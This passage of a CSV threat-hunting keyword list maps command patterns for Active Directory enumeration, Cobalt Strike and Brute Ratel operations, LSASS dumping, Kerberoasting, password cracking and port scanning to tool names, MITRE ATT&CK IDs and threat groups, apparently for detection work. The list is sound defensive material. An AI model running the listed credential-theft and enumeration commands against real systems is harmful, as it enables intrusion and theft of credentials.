APT29,C2,https://github.com/EspressoCake/Firewall_Walker_BOF,1,0,N/A,10,10,98,13,2021-10-10T03:28:27Z,2021-10-09T05:17:10Z -Get-ADComputer -Filter {TrustedForDelegation -eq $True},greyware_tool_keyword,powershell,AD Module Enumerate computers with Unconstrained Delegation,T1021.004 - T1087.002 - T1018,TA0007 - TA0008 - TA0011,N/A,N/A,AD Enumeration,https://hideandsec.sh/books/cheatsheets-82c/page/active-directory,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -Get-ADGroup -Filter *Name -like *admin*,greyware_tool_keyword,powershell,AD Module Search for a particular string in attributes (admin),T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://hideandsec.sh/books/cheatsheets-82c/page/active-directory,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -Get-ADObject -Filter {msDS-AllowedToDelegateTo * -Properties msDS-AllowedToDelegateTo*,greyware_tool_keyword,powershell,AD Module Enumerate principals with Constrained Delegation enabled,T1021.004 - T1087.002 - T1018,TA0007 - TA0008 - TA0011,N/A,N/A,AD Enumeration,https://hideandsec.sh/books/cheatsheets-82c/page/active-directory,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -Get-ADObject -SearchBase *CN=Shadow Principal Configuration*CN=Services* (Get-ADRootDSE).configurationNamingContext) | select *msDS-ShadowPrincipalSid*,greyware_tool_keyword,powershell,Enumerate shadow security principals mapped to a high priv group,T1069.002 - T1087.002 - T1018,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://hideandsec.sh/books/cheatsheets-82c/page/active-directory,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth,greyware_tool_keyword,powershell,AD module Enumerate users,T1021.004 - T1087.002 - T1018,TA0007 - TA0008 - TA0011,N/A,N/A,AD Enumeration,https://hideandsec.sh/books/cheatsheets-82c/page/active-directory,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -Get-ADUser -Filter {TrustedForDelegation -eq $True},greyware_tool_keyword,powershell,AD Module Enumerate computers with Unconstrained Delegation,T1021.004 - T1087.002 - T1018,TA0007 - TA0008 - TA0011,N/A,N/A,AD Enumeration,https://hideandsec.sh/books/cheatsheets-82c/page/active-directory,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -get-delegation *,offensive_tool_keyword,cobaltstrike,This tool uses LDAP to check a domain for known abusable Kerberos delegation settings,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/IcebreakerSecurity/DelegationBOF,1,0,N/A,10,10,115,21,2022-05-04T14:00:36Z,2022-03-28T20:14:24Z -get-delegation *,offensive_tool_keyword,DelegationBOF,This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.,T1098 - T1214 - T1552,TA0006,N/A,N/A,Credential Access,https://github.com/IcebreakerSecurity/DelegationBOF,1,0,N/A,N/A,10,115,21,2022-05-04T14:00:36Z,2022-03-28T20:14:24Z -Get-DomainComputer -TrustedToAuth,greyware_tool_keyword,powershell,AD Module Enumerate principals with Constrained Delegation enabled,T1021.004 - T1087.002 - T1018,TA0007 - TA0008 - TA0011,N/A,N/A,AD Enumeration,https://hideandsec.sh/books/cheatsheets-82c/page/active-directory,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -Get-DomainUser -TrustedToAuth,greyware_tool_keyword,powershell,AD Module Enumerate principals with Constrained Delegation enabled,T1021.004 - T1087.002 - T1018,TA0007 - TA0008 - TA0011,N/A,N/A,AD Enumeration,https://hideandsec.sh/books/cheatsheets-82c/page/active-directory,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -Get-GPO -All,greyware_tool_keyword,powershell,AD Module GroupPolicy - List of GPO in the domain,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://hideandsec.sh/books/cheatsheets-82c/page/active-directory,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -Get-NetGroup -FullData*,greyware_tool_keyword,powershell,Find groups in the current domain (PowerView),T1069.002 - T1087.002 - T1018,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://hideandsec.sh/books/cheatsheets-82c/page/active-directory,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -getprivs,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -get-spns *,offensive_tool_keyword,cobaltstrike,This tool uses LDAP to check a domain for known abusable Kerberos delegation settings,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/IcebreakerSecurity/DelegationBOF,1,0,N/A,10,10,115,21,2022-05-04T14:00:36Z,2022-03-28T20:14:24Z -grab_token *,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -hydra -*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,0,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -Impacket *,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -impersonate *\*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -import boko*,offensive_tool_keyword,boko,boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored,T1195 - T1078 - T1079 - T1574,TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/bashexplode/boko,1,0,N/A,N/A,1,59,12,2021-09-28T22:36:01Z,2020-05-22T21:46:33Z -inceptor*dotnet*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -kerberoast *,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -koh exit*,offensive_tool_keyword,cobaltstrike,Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GhostPack/Koh,1,0,N/A,10,10,447,59,2022-07-13T23:41:38Z,2022-07-07T17:14:09Z -koh list*,offensive_tool_keyword,cobaltstrike,Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GhostPack/Koh,1,0,N/A,10,10,447,59,2022-07-13T23:41:38Z,2022-07-07T17:14:09Z -Ladon *-* *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -Ladon *.exe*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -Ladon */* *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -Ladon Mac * ,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -Lapsdump *,offensive_tool_keyword,C2-Tool-Collection,A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques,T1055 - T1218 - T1059 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/outflanknl/C2-Tool-Collection,1,0,N/A,10,10,885,152,2023-05-03T19:35:38Z,2022-04-22T13:43:35Z -ldapsearch -h * -x*,greyware_tool_keyword,ldapsearch,ldapsearch to enumerate ldap,T1018 - T1087 - T1069,TA0007 - TA0002 - TA0008,N/A,N/A,Reconnaissance,https://man7.org/linux/man-pages/man1/ldapsearch.1.html,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -LdapSignCheck *,offensive_tool_keyword,cobaltstrike,Beacon Object File & C# project to check LDAP signing,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/cube0x0/LdapSignCheck,1,0,N/A,10,10,148,22,2022-10-25T13:36:43Z,2022-02-24T20:25:31Z -ldeep *,offensive_tool_keyword,ldeep,In-depth ldap enumeration utility,T1589 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://github.com/franc-pentest/ldeep,1,0,N/A,N/A,3,219,26,2023-10-02T20:36:02Z,2018-10-22T18:21:44Z -list_exports *.dll*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -load *.cna,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -make_token *,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -make_token *,offensive_tool_keyword,cobaltstrike,A basic implementation of abusing the SeBackupPrivilege via Remote Registry dumping to dump the remote SAM SECURITY AND SYSTEM hives.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/m57/cobaltstrike_bofs,1,0,N/A,10,10,153,25,2022-07-23T20:37:52Z,2020-07-30T22:36:51Z -masscan *,offensive_tool_keyword,masscan,TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.,T1046,TA0007,N/A,N/A,Reconnaissance,https://github.com/robertdavidgraham/masscan,1,0,N/A,N/A,10,21683,2981,2023-08-09T13:28:54Z,2013-07-28T05:35:33Z -memdump *,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -memex /*.exe*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -memhunt *,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -na.exe *,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -nanodump*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -nc -vz *,greyware_tool_keyword,netcat,Netcat is a featured networking utility which reads and writes data across network connections. using the TCP/IP protocol It is designed to be a reliable back-end tool that can be used directly or easily driven by other programs and scripts. At the same time. it is a feature-rich network debugging and exploration tool. since it can create almost any kind of connection you would need and has several interesting built-in capabilities,T1043 - T1052 - T1071 - T1095 - T1132 - T1573,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,POST Exploitation tools,http://netcat.sourceforge.net/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -needle_sift *,offensive_tool_keyword,cobaltstrike,Strstr with user-supplied needle and filename as a BOF.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 